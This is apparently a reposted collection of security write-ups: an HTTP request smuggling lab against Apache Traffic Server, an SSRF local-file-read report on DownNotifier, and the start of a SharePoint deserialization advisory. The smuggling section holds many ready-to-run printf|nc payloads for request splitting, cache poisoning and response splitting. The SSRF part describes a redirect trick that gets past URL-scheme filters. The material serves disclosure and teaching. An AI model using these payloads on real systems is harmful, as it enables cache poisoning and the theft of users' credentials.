'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=2 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=3 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
'GET /?cache=4 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

This is pipelining; it's not only using HTTP keep-alive, because we send the chain of queries without waiting for the responses. See my previous post for details on keep-alive and pipelining. You should see the Nginx access log in the docker-compose output. If you do not rotate some arguments in the query, Nginx won't be reached by your requests, because ATS is already caching the result (CTRL+C on the docker-compose output and docker-compose up will remove any cache).

Request Splitting by Double Content-Length

Let's start playing for real. That's the 101 of HTTP smuggling: the easy vector. Double Content-Length header support is strictly forbidden by RFC 7230 section 3.3.3, point 4 (bold added):

If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response.

Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005).
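The divergence the RFC warns about can be sketched with a toy parser (hypothetical code, not taken from any of the servers in this lab): two agents that each trust a different Content-Length header frame the very same bytes differently, and that disagreement is exactly what creates the hidden second query.

```python
# Toy framing logic (hypothetical, not ATS/HaProxy code): pick either the
# first or the last Content-Length header and see what ends up as "body".
def read_body(raw: bytes, pick_first: bool) -> bytes:
    head, _, rest = raw.partition(b"\r\n\r\n")
    lengths = [int(line.split(b":", 1)[1].decode())
               for line in head.split(b"\r\n")
               if line.lower().startswith(b"content-length:")]
    cl = lengths[0] if pick_first else lengths[-1]
    return rest[:cl]

hidden = b"GET /hidden HTTP/1.1\r\nHost: example.com\r\n\r\n"
raw = (b"GET /a HTTP/1.1\r\n"
       b"Host: example.com\r\n"
       b"Content-Length: 0\r\n"
       b"Content-Length: " + str(len(hidden)).encode() + b"\r\n"
       b"\r\n" + hidden)

# An agent trusting the first header sees an empty body, so the hidden GET
# stays on the wire as a second pipelined request; an agent trusting the
# last header swallows it as body. Same bytes, two different message counts.
```

When two chained agents make opposite choices, one of them sees one request where the other sees two, and the extra response desynchronizes the connection.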
Sending such a query directly to ATS generates two responses (one 400 and one 200):

printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Content-Length: 0\r\n'\
'Content-Length: 66\r\n'\
'\r\n'\
'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

The regular response should be a single 400 error. Using port 8001 (HaProxy) would not work: HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is a critical request splitting, classical, but hard to reproduce in a real-life environment if robust tools are used in the reverse proxy chain.

So, why critical? Because you could also consider ATS to be robust, use a new, unknown HTTP server behind or in front of ATS, and expect such smuggling attacks to be properly detected. And there is another factor of criticality: any other HTTP parsing issue can be combined with this double Content-Length. Say you have another issue which allows you to hide one header from all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-Length and you're done, without being blocked by a previous actor. In our current case, ATS, you have one example of such a hidden-header issue with the 'space-before-:' flaw that we will analyze later.

Request Splitting by NULL Character Injection

This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after); it's also not the biggest impact, as we will use a really bad, easily detected query to attack. But I love the magical NULL (\0) character. Using a NULL byte in a header triggers a query rejection on ATS, which is fine, but also a premature end of query, and if pipelines are not closed after a first error, bad things can happen: the next line is interpreted as the next query in the pipeline.
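This premature end-of-query behavior can be sketched with a hypothetical toy parser (illustrative only, not ATS source): a NUL byte in a header line aborts the current request, and parsing resumes on the very next line, so a line that was meant as data becomes a request line.

```python
# Toy pipeline parser (hypothetical): a header containing NUL rejects the
# current request, and the next line restarts request parsing.
def split_pipeline(raw: bytes):
    requests, current = [], []
    for line in raw.split(b"\r\n"):
        if b"\x00" in line:
            requests.append(("400", current))  # reject what we had so far...
            current = []                       # ...and resume on the next line
        elif line == b"":
            if current:
                requests.append(("parsed", current))
            current = []
        else:
            current.append(line)
    return requests

raw = (b"GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n"
       b"X-Something: \x00 something\r\n"
       b"GET /index.html?bar=2 HTTP/1.1\r\n"
       b"Host: dummy-host7.example.com\r\n"
       b"\r\n")

# -> one rejected request, then one "parsed" request starting at the GET
#    line that was supposed to be plain header data
```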
So, an (almost, if you except the NULL character) valid pipeline like this one:

01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 X-Foo: Bar\r\n
04 \r\n
05 GET /index.html?bar=1 HTTP/1.1\r\n
06 Host: dummy-host7.example.com\r\n
07 \r\n

generates two 400 errors, because the second query starts with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there is no \r\n between the 2 queries):

01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 GET /index.html?bar=2 HTTP/1.1\r\n
04 Host: dummy-host7.example.com\r\n
05 \r\n

It generates one 400 error and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request splitting attack. But line 03 is a really bad header line that most agents would reject; you cannot read that as a valid single query. The fake pipeline would be detected early as a bad query: line 03 is clearly not a valid header line.

GET /index.html?bar=2 HTTP/1.1\r\n
!=
<HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF]

For the first line the syntax is one of these two forms:

<METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF]
<METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri)

LOCATION may be used to inject the special [:] that is required in a header line, especially in the query string part, but this would inject a lot of bad characters into the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try the ABSOLUTE-URI alternative syntax, where the [:] comes earlier on the line, and the only bad character for a header name would be the space. This will also fix the potential presence of a double Host header (an absolute uri replaces the Host header).
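How such an absolute-URI request line tokenizes when mis-read as a header can be sketched in a couple of lines (a hypothetical illustration of a lenient parser splitting on the first colon):

```python
# A lenient header parser splits on the first ':'; for an absolute-URI
# request line the colon of "http://" arrives early, so the would-be
# header name stays short -- its only illegal character is the space.
line = b"GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1"
name, _, value = line.partition(b":")

# name  == b"GET http"   (invalid per RFC 7230: contains a space)
# value == b"//dummy-host7.example.com/index.html?bar=2 HTTP/1.1"
```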
01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 X-Something: \0 something\r\n
04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n
05 \r\n

Here the bad header which becomes a query is line 04, with a header name of GET http and a header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space), but I'm pretty sure we could find some HTTP agents transferring this header (ATS is one proof of that: space characters in header names were allowed).

A real attack using this trick looks like this:

printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-Something: "\0something"\r\n'\
'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\
'\r\n'\
'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

This is just two queries (the first one has two bad headers: one with a NULL, one with a space in the header name); for ATS it's three queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: header added by Nginx. After that, ATS adds a third response, a 404, but the previous actor expects only two responses, and the second response is already replaced.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:34:53 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

Then:

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replacing=1&zorg=2
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

And then the extra unused response:

HTTP/1.1 404 Not Found
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 153
Age: 0
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.15.5</center>
</body>
</html>

If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result; that attacking query really is too bad.

HTTP/1.0 400 Bad request
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>400 Bad request</h1>
Your browser sent an invalid request.
</body></html>

That's an HTTP request splitting attack, but real-world usage may be hard to find. The fix on ATS is the 'close on error': when a 400 error is triggered, the pipeline is stopped and the socket is closed after the error.

Request Splitting using Huge Header, Early End-Of-Query

This attack is almost the same as the previous one, but it does not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way as with the NULL premature end of query.

A note on huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example):

X: ==============( 65 532 '=' )========================\r\n

You can use the %ns form in printf to generate this, producing a big number of spaces.
But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string:

printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " "

Try it against Nginx:

printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65532s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8002

I get one 400 error; that's the normal behavior, Nginx does not like huge headers. Now try it against ATS7:

printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8007

And after the 400 error we get a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header, but we do not have the NULL character. Still, 65000 characters is very big; most actors would reject a query after 8000 characters on one line.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:40:17 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:40:17 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replaced=0&cache=8
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Cache Poisoning using Incomplete Queries and Bad Separator Prefix

Cache poisoning, that sounds great. In smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why split pipelines are dangerous.

ATS supports an invalid header syntax:

HEADER[SPACE]:HEADER VALUE\r\n

That does not conform to RFC 7230 section 3.2:

Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace.

So:

HEADER:HEADER_VALUE\r\n => OK
HEADER:[SPACE]HEADER_VALUE\r\n => OK
HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK
HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK

And RFC 7230 section 3.2.4 adds (bold added):

No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream.

ATS will interpret the bad header, and also forward it without alteration.
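The disagreement on 'HEADER[SPACE]:' can be sketched with two toy parsers (hypothetical code, not taken from either server): a strict one enforcing the RFC 7230 token rule for field names, and a lenient one that trims the name before using it, roughly the flawed behavior.

```python
import re

TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"  # RFC 7230 "token" characters

def strict_parse(line: str):
    """Reject any field name that is not a valid token (RFC behavior)."""
    name, _, value = line.partition(":")
    if not re.fullmatch(TOKEN, name):
        raise ValueError("400 Bad Request")
    return name, value.strip()

def lenient_parse(line: str):
    """Trim the name before using it (roughly the flawed behavior)."""
    name, _, value = line.partition(":")
    return name.strip(), value.strip()

# strict_parse("Content-Length :77")  -> raises (space in the field name)
# lenient_parse("Content-Length :77") -> ("Content-Length", "77")
```

A third kind of agent, like the Nginx behavior described below, neither rejects nor honors the line: it silently drops it, and that three-way disagreement is what the attack exploits.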
Using this flaw we can add headers to our request that are invalid for any valid HTTP agent but still interpreted by ATS, like:

Content-Length :77\r\n

Or (try it as an exercise):

Transfer-encoding :chunked\r\n

Some HTTP servers will effectively reject such a message with a 400 error. But some will simply ignore the invalid header. That's the case for Nginx, for example. ATS will maintain a keep-alive connection to the Nginx backend, so we'll use this ignored header to transmit a body (ATS thinks it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a CRLF at the end-of-header) to absorb a future query sent to Nginx. This sort of incomplete query, completed by the next incoming query, is also a basic smuggling technique demonstrated 13 years ago.

01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-Control: max-age=200\r\n
04 X-info: evil 1.5 query, bad CL header\r\n
05 Content-Length :117\r\n
06 \r\n
07 GET /index.html?INJECTED=1 HTTP/1.1\r\n
08 Host: dummy-host7.example.com\r\n
09 X-info: evil poisoning query\r\n
10 Dummy-incomplete:

Line 05 is invalid (' :'), but for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS, transmitted to the backend. For Nginx:

Line 05 is ignored.
Line 07 is a new request (and the first response is returned).
Line 10 has no "\r\n", so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS...
Attack schema

[ATS Cache poisoning - space before header separator + backend ignoring bad headers]

Innocent        Attacker        ATS             Nginx
    |               |               |               |
    |               |--A(1A+1/2B)-->|               | * Issue 1 & 2 *
    |               |               |--A(1A+1/2B)-->| * Issue 3 *
    |               |               |<-A(404)-------|
    |               |               |        [1/2B] |
    |               |<-A(404)-------|        [1/2B] |
    |               |--C----------->|        [1/2B] |
    |               |               |--C----------->| * ending B *
    |               |        [*CP*]<--B(200)--------|
    |               |<--B(200)------|               |
    |--C--------------------------->|               |
    |<--B(200)--------------------[HIT]             |

1A + 1/2B means request A + an incomplete query B
A(X): means X query is hidden in the body of query A
CP: Cache poisoning
Issue 1: ATS transmits 'header[SPACE]: Value', a bad HTTP header.
Issue 2: ATS interprets this bad header as valid (so 1/2B stays hidden in the body).
Issue 3: Nginx encounters the bad header but ignores it instead of sending a 400 error, so 1/2B is discovered as a new query (no Content-Length).
Request B contains an incomplete header (no CRLF).
Ending B: the first line of query C ends the incomplete header of query B; all other headers are added to the query. C disappears and mixes C's HTTP credentials with all the previous B headers (cookie/bearer token/Host, etc.).

Instead of cache poisoning you could also play with the incomplete 1/2B query and wait for an innocent query to finish this request with the HTTP credentials of that user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning.
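The "ending B" step can be sketched by simply concatenating buffers (hypothetical byte strings, not the exact lab queries): the unterminated header of B eats C's request line, and C's remaining headers, credentials included, are absorbed into B.

```python
# What the backend's receive buffer holds: the incomplete query B...
pending_b = (b"GET /index.html?INJECTED=1 HTTP/1.1\r\n"
             b"Host: dummy-host7.example.com\r\n"
             b"Dummy-incomplete: ")             # no CRLF: header unfinished

# ...then an innocent query C arrives on the same keep-alive connection.
query_c = (b"GET /victim.html HTTP/1.1\r\n"
           b"Host: dummy-host7.example.com\r\n"
           b"Cookie: session=SECRET\r\n"
           b"\r\n")

merged = pending_b + query_c
head_lines = merged.split(b"\r\n\r\n", 1)[0].split(b"\r\n")

# head_lines[0] is still B's request line; C's request line became the
# value of Dummy-incomplete, and C's Cookie header now belongs to B.
```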
Run this attack:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'X-info: evil 1.5 query, bad CL header\r\n'\
'Content-Length :117\r\n'\
'\r\n'\
'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
|nc -q 1 127.0.0.1 8007
done

It should work. In this lab configuration Nginx adds an X-Location-echo header echoing the first line of the query in the response headers. This way we can observe that the second response is removing the real second query's first line and replacing it with the hidden first line. In my case the last query response contained:

X-Location-echo: /index.html?INJECTED=3

But this last query was GET /index.html?INJECTED=9. You can check the cache content with:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007
done

In my case I found six 404 responses (regular) and three 200 responses (ouch): the cache is poisoned. If you want a deeper understanding of smuggling you should play with Wireshark on this example. Do not forget to restart the cluster to empty the cache.

Here we have not played with a C query yet; the cache poisoning occurs on our A query (unless you consider the /does-not-exists.html?cache='$i' requests to be C queries). But you can easily try to inject a C query into this cluster, where Nginx has some waiting requests, and try to get it poisoned with /index.html?INJECTED=3 responses:

for i in {1..9} ;do
printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007
done

This will give you a feel for real-world exploitation: you have to repeat the attack to obtain something.
Vary the number of servers in the cluster, the pool settings on the various layers of reverse proxies, etc., and things get complex. The easiest attack is to be a chaos generator (defacement-like, or DOS); fine cache replacement of a specific target, on the other hand, requires careful study and a bit of luck.

Does this work on port 8001 with HaProxy? Well, no, of course not. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue to hide this bad request in a body, or you would need a load balancer which does not detect this invalid syntax. Note that in this example the Nginx behavior on invalid header syntax (ignoring it) is also not standard (and won't be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd's CVE-2016-8743.

HTTP Response Splitting: Content-Length Ignored on Cache Hit

Still there? Great! Because now comes the nicest issue, at least for me, mainly because I spent a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce, I had failures, and successes on previously undetected issues, and back to step 1. When you cannot reproduce an issue you start doubting that you saw it before. Suddenly you find it again, but then no, etc. And of course I was not searching for the root cause in the right examples; I was, for example, triggering tests on bad chunked transmissions, or delayed chunks. It was a very long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests.

On a cache hit, the Content-Length header of a GET query is not read. That's so easy once you know it... And exploitation is also quite easy: we can hide a second query in the first query's body, and on a cache hit this body becomes a new query.
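A hypothetical sketch of the bug (illustrative only, not ATS code): on a miss the proxy drains Content-Length bytes of body before reading the next request; on a hit it forgets to, so the body bytes re-surface as a new pipelined query.

```python
def leftover_bytes(raw: bytes, cache_hit: bool) -> bytes:
    """Return what remains on the connection after handling one GET."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    cl = 0
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            cl = int(line.split(b":", 1)[1].decode())
    if not cache_hit:
        rest = rest[cl:]   # MISS: the body is drained as it should be
    return rest            # HIT: body bytes survive as the "next" request

hidden = b"GET /index.html?evil=1 HTTP/1.1\r\nHost: example.com\r\n\r\n"
raw = (b"GET /index.html?cache=1 HTTP/1.1\r\n"
       b"Host: example.com\r\n"
       b"Content-Length: " + str(len(hidden)).encode() + b"\r\n"
       b"\r\n" + hidden)

# leftover_bytes(raw, cache_hit=False) -> b""     (one query, one response)
# leftover_bytes(raw, cache_hit=True)  -> hidden  (a second query appears)
```

This is why the attack only fires on the second launch: the first run warms the cache (a miss), and only subsequent hits skip the body drain.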
This sort of query will get one response at first (and, yes, that's only one query); on a second launch it will render two responses (so an HTTP request splitting by definition):

01 GET /index.html?cache=zorg42 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-control: max-age=300\r\n
04 Content-Length: 71\r\n
05 \r\n
06 GET /index.html?cache=zorg43 HTTP/1.1\r\n
07 Host: dummy-host7.example.com\r\n
08 \r\n

Line 04 is ignored on a cache hit (so only after the first run); after that, line 06 is a new query and not just the first query's body. This HTTP query is valid: THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful, complete smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS, we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees three queries:

Attack schema

[ATS HTTP-Splitting issue on Cache hit + GET + Content-Length]

Something       HaProxy          ATS             Nginx
    |--A----------->|               |               |
    |               |--A----------->|               |
    |               |               |--A----------->|
    |               |       [cache]<--A-------------|
    | (etc.) <----------------------|               |  warmup
---------------------------------------------------------
    |               |               |               |  attack
    |--A(+B)+C----->|               |               |
    |               |--A(+B)+C----->|               |
    |               |             [HIT]             |  * Bug *
    |               |<--A-----------|               |  * B 'discovered' *
    |               |               |--B----------->|
    |               |               |<-B------------|
    |               |<-B------------|               |
[ouch]<-B-----------|               |               |  * wrong resp. *
    |               |--C----------->|               |
    |               |               |<--C-----------|
    |           [R]<--C-------------|               |  rejected

First, we need to init the cache; we use port 8001 to get a stream HaProxy->ATS->Nginx.

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 0\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8001

You can run it twice and see that the second time it does not reach the Nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy.
We use a pipeline of two queries; ATS will send back three responses. If a keep-alive mode is present in front of ATS there is a security problem. Here that's the case, because we do not use option http-close on HaProxy (which would prevent the usage of pipelines).

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 74\r\n'\
'\r\n'\
'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8001

The query for /victim.html (which should be a 404 in our example) gets the response for /index.html (X-Location-echo: /index.html?evil=cogip2000).

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:41 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?cache=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 12

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?evil=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Here the issue is critical, especially because there is no invalid syntax in the attacking query. We have an HTTP response splitting, which means two main impacts:

ATS may be used to poison or hurt an actor used in front of it
the second query is hidden (it's a body: binary garbage for an HTTP actor), so any security filter set in front of ATS cannot block the second query
We could use that to hide a second layer of attack, like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the "Drain the request body if there is a cache hit" fix is about.

Just to better understand the real-world impact: here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix of C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies...

Timeline

2017-12-26: Report to project maintainers
2018-01-08: Acknowledgment by project maintainers
2018-04-16: Version 7.1.3 with most of the fixes
2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all the fixes, and some other CVE fixes)
2018-08-28: CVE announce
2019-09-17: This article (yes, the url date is wrong; the real date is September)

See also

Video Defcon 24: HTTP Smuggling
Defcon support
Video Defcon demos

Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
  4. SSRF | Reading Local Files from DownNotifier server

Posted on September 18, 2019 by Leon

Hello guys, this is my first write-up and I would like to share it with the bug bounty community; it's an SSRF I found some months ago.

DownNotifier is an online tool to monitor website downtime. This tool sends an alert to the registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look at https://www.downnotifier.com. When I browsed the website, I noticed a text field for a URL, and an SSRF vulnerability quickly came to mind.

Getting XSPA

The first thing to do is add http://127.0.0.1:22 in the "Website URL" field. Select "When the site does not contain a specific text" and write any random text. I sent that request and two emails arrived in my mailbox a few minutes later: the first to alert that a website is being monitored, and the second to alert that the website is down, but with the response inside an html file. And what is the response…?

Getting Local File Read

I was excited, but that's not enough to fetch very sensitive data, so I tried the same process with some URI schemes such as file, ldap, gopher, ftp, and ssh, but it didn't work. I was thinking about how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with the Location header in a PHP file hosted on your own domain. I hosted a PHP file with such a redirect and went through the same process, registering a website to monitor. A few minutes later an email arrived in the mailbox with an html file. And the response was…

I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header.
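The write-up doesn't include the PHP source (it was shown as an image), but the idea can be sketched with a hypothetical stand-in, here in Python rather than PHP: a page on your own domain that answers any request with a redirect whose Location uses the forbidden scheme, hoping the SSRF client follows redirects without re-checking the scheme.

```python
# Hypothetical stand-in for the attacker's redirect page (the original
# write-up used a PHP file): reply 302 with a file:// Location.
from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToFile(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        # illustrative target; the vulnerable fetcher follows this redirect
        self.send_header("Location", "file:///etc/passwd")
        self.end_headers()

# To serve it: HTTPServer(("0.0.0.0", 8080), RedirectToFile).serve_forever()
```

The input filter only validates the URL the victim fetches first (an innocent http:// one); the scheme check is never re-applied to the redirect target.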
Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
  5. CVE-2019-1257: Code Execution on Microsoft SharePoint Through BDC Deserialization September 19, 2019 | The ZDI Research Team SUBSCRIBE Earlier this year, researcher Markus Wulftange (@mwulftange) reported a remote code execution (RCE) vulnerability in Microsoft SharePoint that ended up being patched as CVE-2019-0604. He wasn’t done. In September, three additional SharePoint RCEs reported by Markus were addressed by Microsoft: CVE-2019-1295, CVE-2019-1296, and CVE-2019-1257. This blog looks at that last CVE, also known as ZDI-19-812, in greater detail. This bug affects all supported versions of SharePoint and received Microsoft’s highest Exploit Index rating, which means they expect to see active attacks in the near future. Vulnerability Details The Business Data Connectivity (BDC) Service in Microsoft SharePoint 2016 is vulnerable to arbitrary deserialization of XmlSerializer streams due to arbitrary method parameter types in the definition of custom BDC models. As shown by Alvaro Muñoz & Oleksandr Mirosh in their Black Hat 2017 talk [PDF], arbitrary deserialization of XmlSerializer streams can result in arbitrary code execution. SharePoint allows the specification of custom BDC models using the Business Data Connectivity Model File Format (MS-BDCMFFS) data format. Part of this specification is the definition of methods and parameters. Here is an example excerpt, as provided by Microsoft: This defines a method named GetCustomer that wraps a stored procedure named sp_GetCustomer (see RdbCommandText property). Both the input parameters (Direction="In") and return parameters (Direction="Return") get defined with their respective type description. In the example shown above, the input parameter has a primitive type of System.Int32, which is safe. The problem occurs if a BDC model is defined that has a parameter of type Microsoft.BusinessData.Runtime.DynamicType. 
